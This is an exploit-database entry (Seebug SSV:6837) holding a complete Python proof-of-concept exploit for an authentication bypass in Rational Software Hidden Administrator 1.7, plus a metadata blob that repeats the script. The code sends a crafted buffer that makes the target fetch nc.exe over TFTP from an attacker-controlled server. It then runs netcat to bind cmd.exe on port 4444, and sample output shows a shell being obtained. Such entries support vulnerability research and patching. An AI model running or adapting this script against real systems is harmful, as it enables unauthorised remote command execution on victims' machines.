ID SSV:6837
Type seebug
Reporter Root
Modified 2007-05-20T00:00:00
Description
No description provided by source.
####################################################################################
# Hidden Administrator Authenticaiton Bypass Exploit #
# ahmed[at]rewterz.com #
# http://www.securityfocus.com/bid/24049 #
# #
# C:\>python rewt-ha-exp.py #
# Usage: rewt-ha-exp.py -h <host ip> -p <port> -t <tftpd server ip> #
# make sure nc.exe exists on tftpd server #
# #
# C:\>telnet 192.168.1.4 4444 #
# C:\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 #
# [+] Connecting to 192.168.1.4 #
# [+] Uploading Files #
# [+] DONE [+] #
# [+] Now Connect to port 4444 on victim IP !!! #
# #
# C:\>telnet 192.168.1.4 4444 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# C:\ha_server> #
####################################################################################
import socket
import struct
import time
import sys
import getopt
def usage():
print "\n"
print "######################################################"
print "# Hidden Administrator Authentication Bypass Exploit #"
print "# Coded By ahmed[at]rewterz.com #"
print "######################################################"
print "\n"
print "Usage: %s -h <host ip> -p <port> -t <tftpd server ip>" % sys.argv[0]
print "make sure nc.exe exists on tftpd server\n"
def exploit():
h ="%X" % (130+len(tftpd))
buff1='_file_manager_operations_copy_files_Loc_Rem_c:\\^file\r\n\x0brewt_ha.bat'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1 += ('\\x' + h).decode('string_escape')
buff1 += '\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00tftp -i ' + tftpd + ' GET nc.exe c:\\nc.exe '
buff1+='\r\nc:\\nc.exe -L -d -p 4444 -e cmd.exe \r\n\r\n '
buff1+=' \r\n\r\n_file_manager_operations_get_cur_dir_c:\r\n'
try:
print "[+] Connecting to %s" %host
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,int(port)))
print "[+] Uploading Files"
s.send(buff1)
time.sleep(2)
s.send('+run_C:\\rewt_ha.bat|\r\n')
time.sleep(1)
print "[+] DONE [+]"
print "[+] Now Connect to port 4444 on victim IP !!!"
except:
print "[+] Could not connect to the server"
if len(sys.argv)<7:
usage()
sys.exit()
try:
options = getopt.getopt(sys.argv[1:], 'h:p:t:')[0]
except getopt.GetoptError, err:
print err
usage()
sys.exit()
for option, value in options:
if option == '-h':
host = value
if option == '-p':
port = int(value)
if option == '-t':
tftpd=value
exploit()
{"href": "https://www.seebug.org/vuldb/ssvid-6837", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-05-20T00:00:00", "title": "Rational Software Hidden Administrator 1.7 Auth Bypass Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-6837", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2007-05-20T00:00:00", "sourceData": "\n ####################################################################################\r\n# Hidden Administrator Authenticaiton Bypass Exploit #\r\n# ahmed[at]rewterz.com #\r\n# http://www.securityfocus.com/bid/24049 #\r\n# #\r\n# C:\\>python rewt-ha-exp.py #\r\n# Usage: rewt-ha-exp.py -h <host ip> -p <port> -t <tftpd server ip> #\r\n# make sure nc.exe exists on tftpd server #\r\n# #\r\n# C:\\>telnet 192.168.1.4 4444 #\r\n# C:\\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 #\r\n# [+] Connecting to 192.168.1.4 #\r\n# [+] Uploading Files #\r\n# [+] DONE [+] #\r\n# [+] Now Connect to port 4444 on victim IP !!! #\r\n# #\r\n# C:\\>telnet 192.168.1.4 4444 #\r\n# Microsoft Windows XP [Version 5.1.2600] #\r\n# (C) Copyright 1985-2001 Microsoft Corp. #\r\n# C:\\ha_server> # \r\n####################################################################################\r\n\r\n\r\nimport socket\r\nimport struct\r\nimport time\r\nimport sys\r\nimport getopt\r\n\r\n\r\ndef usage():\r\n\tprint "\\n"\r\n\tprint "######################################################"\r\n\tprint "# Hidden Administrator Authentication Bypass Exploit #"\r\n\tprint "# Coded By ahmed[at]rewterz.com #"\r\n\tprint "######################################################"\r\n\tprint "\\n"\r\n\tprint "Usage: %s -h <host ip> -p <port> -t <tftpd server ip>" % sys.argv[0]\r\n\tprint "make sure nc.exe exists on tftpd server\\n"\r\n\r\ndef exploit():\r\n\th ="%X" % (130+len(tftpd))\r\n buff1='_file_manager_operations_copy_files_Loc_Rem_c:\\\\^file\\r\\n\\x0brewt_ha.bat'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1 += ('\\\\x' + h).decode('string_escape')\r\n\tbuff1 += '\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n\tbuff1+='\\x00tftp -i ' + tftpd + ' GET nc.exe c:\\\\nc.exe '\r\n\tbuff1+='\\r\\nc:\\\\nc.exe -L -d -p 4444 -e cmd.exe \\r\\n\\r\\n '\r\n\tbuff1+=' \\r\\n\\r\\n_file_manager_operations_get_cur_dir_c:\\r\\n'\r\n\ttry:\r\n\t\tprint "[+] Connecting to %s" %host\r\n\t s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\tconnect=s.connect((host,int(port)))\r\n\t\tprint "[+] Uploading Files"\r\n\t\ts.send(buff1)\r\n\t time.sleep(2)\r\n\t s.send('+run_C:\\\\rewt_ha.bat|\\r\\n')\r\n\t time.sleep(1)\r\n\t print "[+] DONE [+]"\r\n print "[+] Now Connect to port 4444 on victim IP !!!"\r\n\texcept:\r\n\t\tprint "[+] Could not connect to the server"\r\n\r\n\r\nif len(sys.argv)<7:\r\n usage()\r\n sys.exit()\r\ntry:\r\n options = getopt.getopt(sys.argv[1:], 'h:p:t:')[0]\r\nexcept getopt.GetoptError, err:\r\n print err\r\n usage()\r\n sys.exit()\r\n\r\n\r\nfor option, value in options:\r\n if option == '-h':\r\n host = value\r\n if option == '-p':\r\n port = int(value)\r\n if option == '-t':\r\n tftpd=value\r\nexploit()\n ", "id": "SSV:6837", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:03:27", "reporter": "Root", "enchantments": {"score": {"value": 0.8, "vector": "NONE", "modified": "2017-11-19T22:03:27", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:03:27", "rev": 2}, "vulnersScore": 0.8}, "references": [], "immutableFields": []}
{}
